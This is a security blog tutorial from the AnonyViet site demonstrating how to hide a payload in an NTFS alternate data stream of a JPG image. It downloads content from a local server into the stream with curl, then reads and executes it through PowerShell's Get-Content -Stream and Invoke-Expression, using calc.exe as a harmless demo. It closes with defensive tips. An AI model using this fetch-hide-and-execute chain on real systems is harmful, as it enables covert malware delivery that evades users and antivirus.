• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result
Home Security

Hacker hides Malware in images and executes how?

AnonyViet by AnonyViet
August 5, 2023
in Security
0
0
SHARES
Share on FacebookShare on Twitter

The digital world is growing strongly, the risk from hackers and Viruses is always the top concern of Internet users. Cyberattacks are increasingly sophisticated and complex, and one of the most feared methods hackers are using is executing malicious code through images. You’ve probably heard about attaching malicious code to image files and spreading it through websites, emails or apps, right? So in this article, Anonyviet demos how hackers execute Viruses (malware) with images and why this method can have serious consequences for the security of our information. Okay, to the main point!

Join the channel Telegram belong to AnonyViet ???? Link ????

Note: The article is for educational, research and learning purposes only. All acts related to the law, Anonyviet will not be responsible for all acts that you cause!

Demo Hacker hides Virus in images and how to execute

First, I prepared an image called anonyviet.jpg, and a Kali Linux server to host the malicious code. Now I use the command curl to get to get “malicious code” contained in payload.txt. In payload.txt I stored a command line calc.exe .This is a simple command to open Calculator on Windows operating system.

Hacker hides Malware in images and executes how?
hide Virus

To embed calc.exe into anonyviet.jpg image, I executed the following command:

curl http://192.168.0.111:8000/payload.txt > anonyviet.jpg:payload

The above command will download the content from the URL “http://192.168.0.111:8000/payload.txt” and write that content to the file “anonyviet.jpg:payload”

After curl command finished executing, we can see the image size has not changed but when you enter the command dir /rthen you can see another data named anonyviet.jpg:payload:$DATA

Hide Virus in pictures
Hide Virus in pictures

Although you already know in anonyviet.jpg:payload:$DATAcontains the data “calc.exe”, but in a different case. Suppose if you execute a virus.exe file, this virus executes the same curl command as above. So how to know the malicious code in the image. And this is how I check with the command below:

powershell -c "Get-Content .\anonyviet.jpg -Stream payload"

The above statement is used to retrieve data from a special data stream in the file “anonyviet.jpg”. To better understand this command, I will explain each part in detail:

  1. powershell: This is a command line program in the Windows operating system that allows the execution of PowerShell commands and scripts.
  2. -c: This is the “command” option in PowerShell that allows you to provide a PowerShell statement directly from the command line.
  3. "Get-Content .\anonyviet.jpg -Stream payload": This is a PowerShell statement quoted in quotes. It will be executed by PowerShell when you run that command.
    • Get-Content: Is a cmdlet (command) in PowerShell used to read the contents of a file.
    • .\anonyviet.jpg: Is the path to the file “anonyviet.jpg” in the current directory
    • -Stream payload: This is the “payload” parameter of the Get-Content command. In PowerShell, “-Stream” allows you to read data from file-specific data streams. In this case, I am retrieving data from the “payload” stream in the file “anonyviet.jpg”
Hide Virus in pictures
Attach Virus to image

So you can see that “calc.exe” has been printed to the screen. So how do I execute “calc.exe”, and this is how I did it:

powershell -c "$opencalc = Get-Content .\anonyviet.jpg -Stream payload; Invoke-Expression $opencalc"

I assigned a variable named $opencalcthen I use the command Invoke-Expression $opencalc. Here is a PowerShell command that uses the “Invoke-Expression” cmdlet to execute the data stored in the variable. $opencalc as a PowerShell command. That is, the content read from the “payload” stream in the file “anonyviet.jpg” will be executed as a PowerShell script

Executing Virus in Image

So you can see that “calc.exe” has been executed through the image. And to be more realistic, I will demo execute malicious code with images + Bypass Antivirus. Please watch the video below:

Here are some ways to prevent Hackers from hiding Viruses in images:

  1. Limit access to PowerShell: Make sure that end users don’t have access to PowerShell or limit the use of PowerShell to users who only need to use it for specific work purposes
  2. Check and update the system: Make sure your computer’s operating system and software are always up to date with the latest security patches. These patches help protect against security holes that hackers can take advantage of
  3. Install only trusted software: Make sure to only install and use trusted applications and software from authentic sources. Avoid downloading and running software from unknown sources
  4. Use anti-malware software: Install and maintain an effective anti-virus and anti-virus software to prevent malicious code and malware attacks
  5. Firewall management and permissions: Set up a firewall to control incoming and outgoing connections and restrict user permissions, especially for administrator accounts
  6. Check input data: In your application, check and validate user input to avoid attacks through insecure input techniques
  7. Create periodic backups: Make sure to back up your data regularly and store it in a safe place to ensure that you have the ability to recover it in the event of a Virus attack.
  8. User training: Enhance Virus Attack Recognition and Security Mindset for your users to understand and defend against potential threats
  9. Check image files and data streams: Use anti-malware software to scan image files and data streams within files to detect and block malicious code that may be hidden in images

So I have demoed how hackers execute Viruses through images. I find this to be a sophisticated and dangerous trick that has a very high ability to spread malicious code. We have explored how images can be used as a weapon in the hands of hackers to break into our systems and infect our computers with malicious software. From hiding Viruses in images to executing Viruses through data streams, these tactics require us to increase awareness and take strong precautions. The security of information and data in the digital age is not a small challenge. To protect ourselves against virus attacks through images, we need a combination of vigilance, knowledge of attack tactics, and the use of reliable security tools. Keeping systems and software up-to-date, along with restricting access and monitoring network activity, are also important factors for safety.

You can also read more articles Exploiting WinRAR vulnerability to spread malicious code on Windows

Rate this post

Tags: executesHackerHidesimagesMalware
Previous Post

How to use Deep Fake on Stable Diffusion to change faces

Next Post

How to create a magic photo on Facebook when clicking on another image

AnonyViet

AnonyViet

Related Posts

SQL Injection Payload List
Security

SQL Injection Payload List

September 9, 2023
Exploiting XSS with Javascript/JPEG Polyglot
Security

Exploiting XSS with Javascript/JPEG Polyglot

September 8, 2023
AnvRS – Reverse Shell Bypass Antivirus Tool
Security

AnvRS – Reverse Shell Bypass Antivirus Tool

August 29, 2023
How to find Stored XSS errors simply
Security

How to find Stored XSS errors simply

August 26, 2023
How to Find Vulnerable Vulnerabilities Using Google Dorks
Security

How to Find Vulnerable Vulnerabilities Using Google Dorks

August 26, 2023
BigBountyRecon: Google Dork Spying Tool
Security

BigBountyRecon: Google Dork Spying Tool

August 12, 2023
Next Post

How to create a magic photo on Facebook when clicking on another image

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recent News

How to Comment on a smiley face with a long mouth on Facebook

How to Comment on a smiley face with a long mouth on Facebook

September 23, 2023
How to use StandBy mode of iPhone iOS 17

How to use StandBy mode of iPhone iOS 17

September 22, 2023

Use Aquarium on the browser to check if the computer configuration is strong

September 22, 2023
Download Panel TMV: Free photo editing panel for Photoshop

Download Panel TMV: Free photo editing panel for Photoshop

September 21, 2023
How to Comment on a smiley face with a long mouth on Facebook

How to Comment on a smiley face with a long mouth on Facebook

September 23, 2023
How to use StandBy mode of iPhone iOS 17

How to use StandBy mode of iPhone iOS 17

September 22, 2023

Use Aquarium on the browser to check if the computer configuration is strong

September 22, 2023
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

How to Comment on a smiley face with a long mouth on Facebook

How to Comment on a smiley face with a long mouth on Facebook

September 23, 2023
How to use StandBy mode of iPhone iOS 17

How to use StandBy mode of iPhone iOS 17

September 22, 2023
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

© 2023 JNews - Premium WordPress news & magazine theme by Jegtheme.